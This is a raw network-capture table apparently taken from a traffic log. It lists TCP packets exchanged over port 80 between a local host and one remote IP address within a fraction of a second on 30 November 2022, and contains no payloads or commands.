Nov 30, 2022 00:10:05.084770918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084790945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084795952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084810972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084813118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084830046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084835052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084861994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084873915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084882975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084901094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084903955 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084919930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084939003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084954023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084954977 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.084969044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.084988117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085005999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085033894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085047007 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085052967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085071087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085094929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085094929 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085114956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085136890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085149050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085149050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085155010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085174084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085201025 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085205078 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085217953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085225105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085242987 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085247040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085263014 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085282087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085304976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085310936 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085324049 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085342884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085349083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085362911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085381031 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085386992 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085400105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085418940 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085424900 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085438013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085457087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085459948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085475922 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085494995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085500002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085529089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085536957 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085555077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085558891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085580111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085594893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085598946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085614920 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085618019 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085637093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085639000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085655928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085658073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085676908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085690022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085707903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085726976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085726976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085741043 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085762024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085768938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085788012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085796118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085807085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085813999 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085825920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085844994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085855961 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085869074 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085886955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085896015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085906982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085918903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085926056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085944891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085964918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.085968018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085983038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.085983992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086004019 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086024046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086031914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086031914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086042881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086055994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086075068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086076975 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086093903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086110115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086112976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086127043 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086132050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086143970 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086150885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086160898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086170912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086182117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086189985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086201906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086209059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086220980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086227894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.086239100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086261988 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.086304903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088294029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088318110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088337898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088361979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088381052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088382959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088382959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088399887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088429928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088430882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088450909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088458061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088469982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088478088 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088489056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088507891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088511944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088511944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088527918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088535070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088546991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088550091 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088566065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088577032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088586092 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088598013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088604927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088617086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088634968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088654041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088654995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088654995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088673115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088687897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088691950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088710070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088711023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088728905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088730097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088747025 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088749886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088767052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088768959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088787079 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088799000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088800907 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088818073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088824034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088855028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088855982 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088874102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088880062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088893890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088910103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088912964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088932037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088936090 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088952065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088969946 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.088970900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088989973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.088996887 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089009047 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089031935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089034081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089052916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089060068 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089071989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089091063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089091063 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089109898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089114904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089128971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089152098 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089154959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089184046 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089195967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089202881 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089215994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089235067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089245081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089260101 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089279890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089283943 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089299917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089312077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089318037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089332104 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089338064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089349985 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089355946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089369059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089375973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089387894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089395046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089406967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089413881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089426994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089432955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089443922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089452028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089462042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089471102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089483023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089490891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089500904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089509964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089519024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089529037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089539051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089548111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089555979 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089567900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089581013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089586973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089598894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089606047 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089616060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089624882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089637995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089644909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089654922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089663982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089673996 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089682102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089694977 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089700937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089719057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089720011 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089734077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089739084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089757919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089766026 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089785099 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089788914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089803934 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089834929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089842081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089842081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089854002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089867115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089874029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089884996 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089893103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089905024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089924097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089939117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089942932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089962959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089981079 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.089988947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.089988947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090003967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.090018988 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090023041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.090029955 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090053082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.090075016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090090036 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090106010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090209961 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.090684891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115232944 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115261078 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115331888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115426064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115453959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115466118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115474939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115494967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115497112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115516901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115539074 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115560055 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115602016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115606070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115627050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115631104 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115647078 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115665913 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115669012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115690947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115695953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115711927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115731001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115731955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115753889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115766048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115786076 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115844965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.115957975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.115979910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116000891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116012096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116029024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116050005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116051912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116070986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116079092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116090059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116100073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116110086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116126060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116146088 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116269112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116291046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116306067 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116311073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116317987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116333008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116338968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116353989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116374016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116384983 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116394997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116406918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116437912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.116650105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.116942883 CET	49708	80	192.168.2.7	88.198.94.71
